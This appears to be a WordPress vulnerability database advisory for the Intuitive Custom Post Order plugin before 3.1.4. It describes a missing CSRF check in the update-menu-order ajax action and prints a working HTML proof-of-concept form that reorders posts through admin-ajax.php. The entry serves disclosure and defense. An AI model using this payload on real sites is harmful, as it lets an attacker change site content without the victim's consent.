WordPress Plugin Vulnerabilities

Intuitive Custom Post Order < 3.1.4 - Arbitrary Menu Order Update via CSRF

Description

The plugin lacks CSRF protection in its update-menu-order ajax action, allowing an attacker to trick any user to change the menu order via a CSRF attack

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="update-menu-order" />
      <input type="hidden" name="order" value="post[]=7&post[]=5" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

References

Classification

Miscellaneous

Original Researcher
Yuya Kotake
Submitter
Yuya Kotake
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2023-01-24 (about 1 years ago)
Added
2023-01-24 (about 1 years ago)
Last Updated
2023-02-24 (about 1 years ago)

Other